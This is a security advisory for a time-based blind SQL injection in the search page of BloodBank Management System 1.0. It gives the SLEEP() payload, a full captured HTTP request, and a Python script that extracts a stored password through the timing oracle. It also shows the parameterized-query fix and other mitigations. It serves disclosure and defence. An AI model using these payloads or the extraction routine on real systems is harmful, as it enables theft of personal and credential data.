
@higordiego
Last active October 25, 2024 13:21

Affected Version:

  • BloodBank Management System: 1.0

Vulnerability Information:

  • Vulnerability Type: SQL Injection (Time-Based Blind)
  • Severity: HIGH
  • Status: Unpatched

Vulnerable Endpoint:

  • /abs.php?search=A%2B&submit=search

Vulnerability Description:

A SQL Injection vulnerability has been identified in the BloodBank Management System version 1.0. It occurs in the search functionality used to query blood type availability: the value of the search parameter reaches the SQL query without being parameterized or validated, so an attacker can append their own SQL to it.

This vulnerability allows an attacker to manipulate SQL queries and execute arbitrary database commands, potentially leading to:

  • Unauthorized access to sensitive data (e.g., donor or recipient information).
  • Database corruption or deletion.
  • Denial of Service (DoS) attacks by causing the database to execute time-consuming operations.

Because the payload travels in the search parameter of an ordinary GET request to the search feature, this high-risk vulnerability can be exploited by remote attackers, leading to a significant breach of confidentiality and availability.


Proof of Concept (PoC):

Below is a GET request (captured in Burp Suite) that demonstrates the time-based blind SQL injection. URL-decoded, the search parameter is:

A+' AND (SELECT 9622 FROM (SELECT(SLEEP(5)))lCfZ)-- lpxk

The single quote closes the string literal in the original query, the subquery calls the SLEEP() function (MySQL/MariaDB) for 5 seconds, and the trailing -- turns the rest of the original query, including the encoded &submit=search that follows, into a comment. A response delayed by 5 seconds proves the injection is successful:

GET /abs.php?search=A%2b'%20AND%20(SELECT%209622%20FROM%20(SELECT(SLEEP(5)))lCfZ)--%20lpxk%26submit%3dsearch&submit=search HTTP/1.1
Host: localhost:8080
sec-ch-ua: "Chromium";v="129", "Not=A?Brand";v="8"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Accept-Language: pt-BR,pt;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:8080/abs.php
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=48068ce7875c00d88ca3aa2b9269b91f
Connection: keep-alive

If the injection is successful, the server pauses for 5 seconds before responding, while the same request without the SLEEP() subquery returns immediately. This confirms that attacker-controlled SQL reaches the database. Since nothing else in the response changes, data is not returned directly; instead it is extracted blind, by making the delay conditional on a guessed byte of the target value (typically with IF(condition, SLEEP(5), 0) or a CASE expression) and repeating the request for each character.


Impact:

  • Data Breach: Unauthorized access to personal information such as blood donors’ and recipients’ data.
  • Service Disruption: Attackers can overload the database, causing a Denial of Service (DoS) by executing time-intensive queries.
  • Data Corruption: Malicious actors can modify or delete critical data in the system.

Images (not reproduced in this extract):

  • Vulnerability Source
  • BurpSuite Request Image

Mitigation Recommendations:

  1. Parameterized Queries: Use prepared statements with bound parameters (PDO or mysqli in PHP) so the search value is sent to the database as data and is never concatenated into the SQL text. Input validation (for example, an allow-list of the valid blood types the search accepts) is worthwhile defense in depth, but on its own it is not a substitute for parameterization.
  2. Error Handling: Ensure error messages do not reveal database information or SQL query structures.
  3. Rate Limiting: Implement rate limiting on search requests to slow down automated blind extraction and abuse via DoS attacks; note that this only raises the cost of exploitation and does not remove the injection.
  4. Database User Privileges: Restrict the privileges of database users to minimize the impact of potential SQL injections.
  5. Security Audits: Regularly perform code reviews and penetration tests to identify and fix vulnerabilities.
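The following is an added example, not code from the gist or from the BloodBank Management System: it works the time-based blind injection from the PoC end to end (replaying the page's payload, then extracting a value character by character through the timing oracle) and places the concatenation that causes the bug next to the prepared-statement fix from mitigation 1. Because abs.php's source is not on the page, the query shape (SELECT ... FROM blood WHERE blood_type = '<search>'), the table and column names, and the users table are assumptions made for the demo. The backend is assumed to be MySQL (SLEEP() is a MySQL/MariaDB function); SQLite stands in for it locally, with SLEEP() and ASCII() registered as user-defined functions so the MySQL-shaped payloads run unchanged, and the SLEEP() shim records that it was reached instead of waiting, which is exactly the signal an attacker gets from timing the HTTP response.

```python
"""
Time-based blind SQL injection worked against a local stand-in for abs.php,
plus the parameterized fix. Everything here is an illustrative assumption:
the query shape, the table/column names, the 'users' table, and SQLite
standing in for MySQL with SLEEP()/ASCII() shims.
"""
import sqlite3

# The payload from the PoC request, URL-decoded (search=A%2b'%20AND%20...).
PAGE_PAYLOAD = "A+' AND (SELECT 9622 FROM (SELECT(SLEEP(5)))lCfZ)-- lpxk"


class Target:
    """Stand-in for abs.php: builds the search query by string concatenation."""

    def __init__(self):
        self.conn = sqlite3.connect(":memory:")
        self.conn.execute("CREATE TABLE blood (blood_type TEXT, units INTEGER)")
        self.conn.executemany("INSERT INTO blood VALUES (?, ?)",
                              [("A+", 12), ("O-", 3)])   # constructed sample data
        self.conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
        self.conn.execute("INSERT INTO users VALUES ('admin', 's3cret!')")
        self.slept = False
        # MySQL-compatible shims: SLEEP() only records that it ran, and
        # ASCII('') / ASCII(NULL) return 0 as MySQL's ASCII('') does.
        self.conn.create_function("SLEEP", 1, self._sleep)
        self.conn.create_function("ASCII", 1, lambda s: ord(s[0]) if s else 0)

    def _sleep(self, seconds):
        self.slept = True          # stands in for a 5-second response delay
        return 0

    def _run(self, sql, params=()):
        self.slept = False
        try:
            rows = self.conn.execute(sql, params).fetchall()
        except sqlite3.Error:
            rows = []              # a real app would render a generic error page
        return rows, self.slept

    def search(self, search):
        """Vulnerable: the user-supplied value is spliced into the SQL text."""
        return self._run(
            f"SELECT blood_type, units FROM blood WHERE blood_type = '{search}'")

    def search_fixed(self, search):
        """Hardened (mitigation 1): bound parameter, input can never become SQL."""
        return self._run(
            "SELECT blood_type, units FROM blood WHERE blood_type = ?", (search,))


def delays(target, condition):
    """Timing oracle: True if injecting `condition` makes the response slow.
    'A+' is kept in front so the AND has a true left-hand side to evaluate."""
    payload = f"A+' AND (CASE WHEN {condition} THEN SLEEP(5) ELSE 0 END)-- "
    _, slept = target.search(payload)
    return slept


def extract(target, subquery, max_len=64):
    """Recover the string returned by `subquery` one character at a time,
    binary-searching each ASCII code (7 requests per character) via the oracle.
    ASCII('') == 0 marks the end of the string."""
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if delays(target, f"ASCII(SUBSTR(({subquery}),{pos},1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        out += chr(lo)
    return out


if __name__ == "__main__":
    t = Target()
    print(t.search(PAGE_PAYLOAD))        # SLEEP() was reached: vulnerable
    print(t.search_fixed(PAGE_PAYLOAD))  # no rows, no delay: payload is a literal
    print(extract(t, "SELECT password FROM users WHERE username='admin'"))
```

Against a live target the `delays` oracle would issue the HTTP request from the PoC with the CASE payload in the search parameter and compare the round-trip time against a baseline; everything else stays the same. The binary search over the ASCII range is what turns one yes/no bit per request into readable data, which is why a "harmless" 5-second delay is already a full confidentiality breach.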